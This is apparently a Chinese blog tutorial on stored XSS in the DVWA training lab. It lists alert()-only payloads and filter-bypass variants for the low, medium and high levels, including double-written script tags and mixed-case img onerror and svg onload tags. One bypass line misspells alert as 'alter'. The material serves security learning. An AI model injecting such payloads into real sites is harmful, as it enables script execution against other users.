dvwa靶场xss储存型

xss储存型

xxs储存型

攻击者事先将恶意代码上传或储存到漏洞服务器中,只要受害者浏览包含此恶意代码的页面就会执行恶意代码。产生层面:后端漏洞特征:持久性的、前端执行、储存在后端数据库

存储型XSS数据交互过程:用户输入数据->后端执行php代码->存入数据库某张表->返回数据给php页面->回显前端

不需要访问指定链接,访问到存在恶意代码的网页会自动弹出

low

没有任何过滤

xss常用语句

cpp 复制代码
<script>alert(/xss/)</script>

message框插入恶意代码

上传后刷新页面就会自动弹出

name栏插入恶意代码

会发现无法对长度做了限制将maxlenth手动更改至能插入恶意代码的长度
相同插入上述代码进行刷新页面也可以

medium

本关对message参数进行了编码导致无法执行代码,还对name参数的

绕过方法

大小写绕过

cpp 复制代码
<script>alter(/xss/)</script>

双写绕过

cpp 复制代码
<sc<script>ript>alert(/xss/)</script>

插入方法和low等级,没什么区别

high

cpp 复制代码
<img src=1 onerror=alert(1)>
<iMg src=1 oNeRrOr=alert(1)>
<ImG src=1 OnErRoR=alert(1)>
<svg onload=alert(1)>
<sVg OnLoAd=alert(1)>
<SvG oNlOaD=alert(1)>
<svg/onload=alert(1)>
<sVg/OnLoAd=alert(1)>
<SvG/oNlOaD=alert(1)>
<marquee onscroll=alert(1)>
<mArQuEe OnScRoLl=alert(1)>
<MaRqUeE oNsCrOlL=alert(1)>

成了

相关推荐
Piko6143 小时前
H3C IRF2 堆叠实战:打造高可靠核心交换网络
运维·网络·笔记
dexi.Chi 攻城狮8 小时前
SQL层次查询语法
经验分享·笔记·sql
HERR_QQ9 小时前
强化学习的数学原理 学习笔记
人工智能·笔记·学习·自动驾驶
云水一下9 小时前
DVWA从入门到精通(十一):XSS (Stored)(存储型XSS)
web安全·xss·dvwa·存储型
liuyicenysabel13 小时前
多服务上线日记二:
服务器·笔记·学习
辰海Coding13 小时前
MiniSpring框架学习笔记-动态代理:如何在运行时插入逻辑?
java·笔记·学习·spring·动态代理
凉、介14 小时前
ARMv8 架构下的刷 Cache 操作
c语言·笔记·学习·架构·嵌入式·arm
cmes_love15 小时前
如何下载沪深股票市场的行情数据,包括委托、成交、订单薄、沪深股票、etf、可转债、指数五档订单薄数据,买一到买五、卖一到卖五历史行情数据笔记
大数据·笔记
摇滚侠15 小时前
Apache Skywalking 实战 阅读笔记 第二章
笔记·apache·skywalking